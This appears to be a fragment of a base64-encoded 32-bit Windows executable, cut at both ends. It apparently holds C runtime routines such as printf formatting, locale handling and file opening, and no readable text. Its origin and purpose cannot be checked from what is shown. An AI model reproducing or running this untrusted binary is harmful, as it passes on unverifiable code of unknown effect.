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uvFD7cPibXg+///ibXs+///ibXM+///ibWo+///iY3k+///ZjvOD4R0CgAAagJaA/o5teD7//+JvaD7//8PjEgKAACNQeBmg/hYdw8Pt8EPtoBI80AAg+AP6wIzwIu1zPv//2vACQ+2hDBo80AAagjB6AReiYXM+///O8YPhDP///+D+AcPh90JAAD/JIWfgkAAM8CDjfT7////iYWk+///iYWw+///iYXU+///iYXc+///iYX4+///iYXY+///6bAJAAAPt8GD6CB0SIPoA3Q0K8Z0JCvCdBSD6AMPhYYJAAAJtfj7///phwkAAION+Pv//wTpewkAAION+Pv//wHpbwkAAIGN+Pv//4AAAADpYAkAAAmV+Pv//+lVCQAAZoP5KnUriwODwwSJnej7//+JhdT7//+FwA+NNgkAAION+Pv//wT3ndT7///pJAkAAIuF1Pv//2vACg+3yY1ECNCJhdT7///pCQkAAIOl9Pv//wDp/QgAAGaD+Sp1JYsDg8MEiZ3o+///iYX0+///hcAPjd4IAACDjfT7////6dIIAACLhfT7//9rwAoPt8mNRAjQiYX0+///6bcIAAAPt8GD+El0UYP4aHRAg/hsdBiD+HcPhZwIAACBjfj7//8ACAAA6Y0IAABmgz9sdRED+oGN+Pv//wAQAADpdggAAION+Pv//xDpaggAAION+Pv//yDpXggAAA+3B2aD+DZ1GWaDfwI0dRKDxwSBjfj7//8AgAAA6TwIAABmg/gzdRlmg38CMnUSg8cEgaX4+////3///+kdCAAAZoP4ZA+EEwgAAGaD+GkPhAkIAABmg/hvD4T/BwAAZoP4dQ+E9QcAAGaD+HgPhOsHAABmg/hYD4ThBwAAg6XM+///AIuFxPv//1GNteD7///Hhdj7//8BAAAA6Oz7//9Z6bgHAAAPt8GD+GQPjzACAAAPhL0CAACD+FMPjxsBAAB0foPoQXQQK8J0WSvCdAgrwg+F7AUAAIPBIMeFpPv//wEAAACJjeT7//+Djfj7//9Ag730+///AI21/Pv//7gAAgAAibXw+///iYXs+///D42NAgAAx4X0+///BgAAAOnpAgAA94X4+///MAgAAA+FyQAAAION+Pv//yDpvQAAAPeF+Pv//zAIAAB1B4ON+Pv//yCLvfT7//+D//91Bb////9/g8ME9oX4+///IImd6Pv//4tb/Imd8Pv//w+EBQUAAIXbdQuhOBxBAImF8Pv//4Ol7Pv//wCLtfD7//+F/w+OHQUAAIoGhMAPhBMFAACNjbT7//8PtsBRUOiA+v//WVmFwHQBRkb/hez7//85vez7//980OnoBAAAg+hYD4TwAgAAK8IPhJUAAACD6AcPhPX+//8rwg+FxgQAAA+3A4PDBDP2RvaF+Pv//yCJtdj7//+Jnej7//+JhZz7//90QoiFyPv//42FtPv//1CLhbT7///Ghcn7//8A/7CsAAAAjYXI+///UI2F/Pv//1Dou/j//4PEEIXAfQ+JtbD7///rB2aJhfz7//+Nhfz7//+JhfD7//+Jtez7///pQgQAAIsDg8MEiZ3o+///hcB0OotIBIXJdDP3hfj7//8ACAAAD78AiY3w+///dBKZK8LHhdj7//8BAAAA6f0DAACDpdj7//8A6fMDAAChOBxBAImF8Pv//1Doqff//1np3AMAAIP4cA+P9gEAAA+E3gEAAIP4ZQ+MygMAAIP4Zw+O6P3//4P4aXRtg/hudCSD+G8Pha4DAAD2hfj7//+AibXk+///dGGBjfj7//8AAgAA61WLM4PDBImd6Pv//+gj9///hcAPhFb6///2hfj7//8gdAxmi4Xg+///ZokG6wiLheD7//+JBseFsPv//wEAAADpwQQAAION+Pv//0DHheT7//8KAAAA94X4+///AIAAAA+EqwEAAAPei0P4i1P86ecBAAB1EmaD+Wd1Y8eF9Pv//wEAAADrVzmF9Pv//34GiYX0+///gb30+///owAAAH49i730+///gcddAQAAV+ii9f//WYuN5Pv//4mFqPv//4XAdBCJhfD7//+Jvez7//+L8OsKx4X0+///owAAAIsDg8MIiYWU+///i0P8iYWY+///jYW0+///UP+1pPv//w++wf+19Pv//4md6Pv//1D/tez7//+NhZT7//9WUP81WBxBAOhC4f//Wf/Qi534+///g8QcgeOAAAAAdCGDvfT7//8AdRiNhbT7//9QVv81ZBxBAOgS4f//Wf/QWVlmg73k+///Z3Uchdt1GI2FtPv//1BW/zVgHEEA6Ozg//9Z/9BZWYA+LXURgY34+///AAEAAEaJtfD7//9W6Qj+//+JtfT7///Hhaz7//8HAAAA6ySD6HMPhGr8//8rwg+Eiv7//4PoAw+FyQEAAMeFrPv//ycAAAD2hfj7//+Ax4Xk+///EAAAAA+Eav7//2owWGaJhdD7//+Lhaz7//+DwFFmiYXS+///iZXc+///6UX+///3hfj7//8AEAAAD4VF/v//g8ME9oX4+///IHQc9oX4+///QImd6Pv//3QGD79D/OsED7dD/JnrF/aF+Pv//0CLQ/x0A5nrAjPSiZ3o+///9oX4+///QHQbhdJ/F3wEhcBzEffYg9IA99qBjfj7//8AAQAA94X4+///AJAAAIvai/h1AjPbg730+///AH0Mx4X0+///AQAAAOsag6X4+///97gAAgAAOYX0+///fgaJhfT7//+LxwvDdQYhhdz7//+Ntfv9//+LhfT7////jfT7//+FwH8Gi8cLw3Qti4Xk+///mVJQU1fouKf//4PBMIP5OYmdkPv//4v4i9p+BgONrPv//4gOTuu9jYX7/f//K8ZG94X4+///AAIAAImF7Pv//4m18Pv//3RZhcB0B4vOgDkwdE7/jfD7//+LjfD7///GATBA6zaF23ULoTwcQQCJhfD7//+LhfD7///Hhdj7//8BAAAA6wlPZoM4AHQGA8KF/3XzK4Xw+///0fiJhez7//+DvbD7//8AD4VlAQAAi4X4+///qEB0K6kAAQAAdARqLesOqAF0BGor6waoAnQUaiBYZomF0Pv//8eF3Pv//wEAAACLndT7//+Ltez7//8r3iud3Pv///aF+Pv//wx1F/+1xPv//42F4Pv//1NqIOiE9f//g8QM/7Xc+///i73E+///jYXg+///jY3Q+///6Iv1///2hfj7//8IWXQb9oX4+///BHUSV1NqMI2F4Pv//+hC9f//g8QMg73Y+///AHV1hfZ+cYu98Pv//4m15Pv///+N5Pv//42FtPv//1CLhbT7////sKwAAACNhZz7//9XUOhV8///g8QQiYWQ+///hcB+Kf+1nPv//4uFxPv//4214Pv//+it9P//A72Q+///g73k+///AFl/puscg43g+////+sTi43w+///Vo2F4Pv//+jW9P//WYO94Pv//wB8IPaF+Pv//wR0F/+1xPv//42F4Pv//1NqIOiI9P//g8QMg72o+///AHQT/7Wo+///6MDN//+Dpaj7//8AWYu9oPv//4ud6Pv//w+3BzP2iYXk+///ZjvGdAeLyOmh9f//O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